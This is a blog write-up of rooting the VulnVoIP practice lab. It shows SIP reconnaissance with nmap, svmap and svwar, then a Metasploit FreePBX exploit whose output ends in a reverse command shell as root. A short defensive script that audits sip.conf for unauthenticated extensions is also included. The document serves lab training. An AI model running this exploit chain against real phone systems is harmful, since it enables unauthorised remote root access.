HackLab – VulnVoIP

So yes there is a REALLY easy way, and a harder way to do VulnVoIP. This is a quick and dirty write-up on the easy way…

root@kali:~# nmap -sU -p 5060 172.16.28.160

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-14 16:28 EST
Nmap scan report for 172.16.28.160
Host is up (0.00032s latency).
PORT     STATE         SERVICE
5060/udp open|filtered sip
MAC Address: 00:0C:29:D8:2E:59 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
root@kali:~#

After that scan as well as running svmap…

root@kali:~# svmap 172.16.28.160
| SIP Device         | User Agent            | Fingerprint |
------------------------------------------------------------
| 172.16.28.160:5060 | Asterisk PBX 1.6.2.11 | disabled    |

root@kali:~#

After some checking we found an extension that required no authentication…

root@kali:~# svwar -e100 172.16.28.160 -x 172.16.28.245 --force
WARNING:TakeASip:Bad user = SIP/2.0 401 - svwar will probably not work!
| Extension | Authentication |
------------------------------
| 100       | noauth         |

root@kali:~#
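The `noauth` result above comes down to server-side configuration. As an added example (not part of the original write-up), this audit flags chan_sip entries with no password and two `[general]` settings that make extension probing easier. The sample config is constructed; the script assumes a plain `sip.conf`, does not resolve templates or `#include`, and treats an absent `alwaysauthreject` as off.

```python
import re

# Constructed sample in chan_sip sip.conf syntax (not taken from the VulnVoIP image).
SAMPLE_SIP_CONF = """\
[general]
allowguest=yes        ; accepts calls from unauthenticated endpoints
;alwaysauthreject=yes ; commented out, so it has no effect

[100]
type=friend
host=dynamic

[101]
type=friend
host=dynamic
secret=Xq7!constructed-example
"""

def parse_sections(text):
    """Return {section: {key: value}} for sip.conf-style text."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment
        m = re.match(r"\[([^\]]+)\]", line)
        if m:
            current = sections.setdefault(m.group(1), {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            # lstrip(">") also accepts the "key => value" form
            current[key.strip().lower()] = value.lstrip(">").strip()
    return sections

def audit(text):
    """Return sorted findings for settings that leave extensions open."""
    sections = parse_sections(text)
    general = sections.get("general", {})
    findings = []
    if general.get("allowguest", "yes").lower() != "no":
        findings.append("general: allowguest is not 'no'")
    # Assumption: absent means off, as in older chan_sip releases.
    if general.get("alwaysauthreject", "no").lower() != "yes":
        findings.append("general: alwaysauthreject is not 'yes'")
    for name, opts in sections.items():
        is_endpoint = opts.get("type") in ("friend", "peer", "user")
        if is_endpoint and not (opts.get("secret") or opts.get("md5secret")):
            findings.append(f"{name}: no secret or md5secret set")
    return sorted(findings)

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_SIP_CONF)))
```

A trunk that authenticates by source IP will also show up as having no secret, so treat each finding as something to review.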

Installed a VoIP soft phone and connected to the extension.

Then we set up the Metasploit module exploit/unix/http/freepbx_callmenum.

Make sure you are logged into the softphone.

msf exploit(freepbx_callmenum) > exploit
 
[*] Started reverse double handler
[*] 172.16.28.160:80 - Sending evil request with range 100
[*] 172.16.28.160:80 - Sending evil request with range 101
msf exploit(freepbx_callmenum) > exploit
 
[*] Started reverse double handler
[*] 172.16.28.160:80 - Sending evil request with range 100
[*] 172.16.28.160:80 - Sending evil request with range 101
msf exploit(freepbx_callmenum) > exploit

[*] Started reverse double handler
[*] 172.16.28.160:80 - Sending evil request with range 100
[*] 172.16.28.160:80 - Sending evil request with range 101
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8OHombj62g8rnmQI;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8OHombj62g8rnmQI\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.175:4444 -> 192.168.1.175:52476) at 2014-12-15 21:42:13 -0500
 
id
uid=0(root) gid=0(root)

We have root!

Keep an eye out for the next post on the more fun way to root HackLab – VulnVoIP.


The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members' employers.